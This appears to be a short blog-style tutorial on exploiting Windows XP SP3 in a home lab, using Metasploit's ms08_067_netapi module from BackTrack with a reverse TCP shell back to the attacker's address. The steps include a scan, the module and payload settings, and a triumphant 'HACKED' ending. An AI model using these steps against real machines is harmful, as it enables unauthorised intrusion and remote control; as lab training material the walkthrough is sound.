Windows XP Service Pack 3 can easily be hacked with Metasploit Framework3.
I’m using Backtrack4-R1 as the “attacker” with IP address 192.168.1.10 and Windows XP Service Pack 3 as the “victim” with IP address 192.168.1.11.
Boot Backtrack –
Login with username “root” and password “toor”.
Assign the IP address.
Do a nmap scan with OS fingerprinting.
Start metasploit.
Use the exploit windows/smb/ms08_067_netapi
Set the payload windows/shell/reverse_tcp
Show the options.
set RHOST=192.168.1.11
set LHOST=192.168.1.10
then run “exploit”
we are in!!!
run a command to confirm.
!!!HACKED!!!





